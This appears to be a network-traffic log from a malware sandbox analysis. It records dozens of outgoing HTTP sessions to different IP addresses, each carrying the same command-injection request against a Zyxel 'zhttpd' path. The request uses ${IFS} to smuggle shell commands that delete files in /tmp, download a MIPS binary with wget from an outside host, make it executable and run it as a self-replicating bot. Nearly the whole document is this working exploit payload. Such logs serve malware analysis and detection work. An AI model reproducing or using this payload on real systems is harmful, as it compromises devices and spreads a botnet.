                                              Jan 29, 2024 07:03:55.111042976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5575192.168.2.143741427.31.136.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111088037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5576192.168.2.144453285.18.22.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111109972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5577192.168.2.144007213.39.89.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111140966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5578192.168.2.144539439.118.73.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111191988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5579192.168.2.143864023.55.185.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111201048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5580192.168.2.1433434182.132.16.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111263037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5581192.168.2.1437894160.120.17.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111289978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5582192.168.2.1452138122.86.28.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111323118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5583192.168.2.145770863.197.158.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111367941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5584192.168.2.1432902221.130.144.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111403942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5585192.168.2.143329059.60.195.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111448050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5586192.168.2.1441634139.51.162.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111466885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5587192.168.2.1444218157.123.48.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111526012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5588192.168.2.1443178195.88.247.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111557007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5589192.168.2.144229024.156.143.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111598969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5590192.168.2.145806052.164.69.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111634016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5591192.168.2.144559419.181.239.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111692905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5592192.168.2.1435652182.141.43.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111746073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5593192.168.2.1450468163.20.47.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111769915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5594192.168.2.1433678141.67.115.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111802101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5595192.168.2.143720498.128.159.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111852884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5596192.168.2.1442296166.67.176.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111877918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5597192.168.2.1438424165.107.83.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111938000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5598192.168.2.145244296.198.175.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.111958027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5599192.168.2.1448440199.27.39.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112010002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5600192.168.2.1451380160.233.185.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112047911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5601192.168.2.145974437.12.182.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112091064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5602192.168.2.1460804141.136.154.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112145901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5603192.168.2.1451858194.86.63.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112185955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5604192.168.2.144938658.79.112.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112231970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5605192.168.2.143299070.217.77.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112257957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5606192.168.2.145960857.130.132.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112310886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5607192.168.2.144644465.206.202.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112345934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5608192.168.2.144270832.134.4.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112373114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5609192.168.2.1441136148.151.220.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112417936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5610192.168.2.1439420209.181.251.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112453938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5611192.168.2.143922692.237.124.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112493038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5612192.168.2.1459572166.30.68.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112526894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5613192.168.2.1444712211.123.105.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112584114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5614192.168.2.1446884119.207.122.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112626076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5615192.168.2.1452678113.157.21.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112673044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5616192.168.2.1443774207.186.7.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112711906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5617192.168.2.1433904142.183.33.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112735033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5618192.168.2.143609847.232.6.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112754107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5619192.168.2.145052832.7.167.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112808943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5620192.168.2.1444572156.146.130.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112831116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5621192.168.2.1458200180.158.99.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112888098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5622192.168.2.1454252116.193.91.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112927914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5623192.168.2.145715474.172.165.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.112978935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5624192.168.2.1454148142.210.76.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113012075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5625192.168.2.1439668188.89.212.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113055944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5626192.168.2.1434984136.165.29.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113101006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5627192.168.2.143907090.160.241.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113147974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5628192.168.2.144119853.106.181.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113193989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5629192.168.2.1441152169.125.186.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113231897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5630192.168.2.145616095.78.246.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113287926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5631192.168.2.145059679.85.187.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113318920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5632192.168.2.1458046211.111.5.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113373041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5633192.168.2.1450524220.119.196.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113393068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5634192.168.2.1434596196.91.50.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113451004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5635192.168.2.1457096139.68.237.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113476992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5636192.168.2.1434112167.2.166.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113513947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5637192.168.2.1443996119.249.79.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113532066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5638192.168.2.1442842158.167.148.177443
                                              TimestampBytes transferredDirectionData
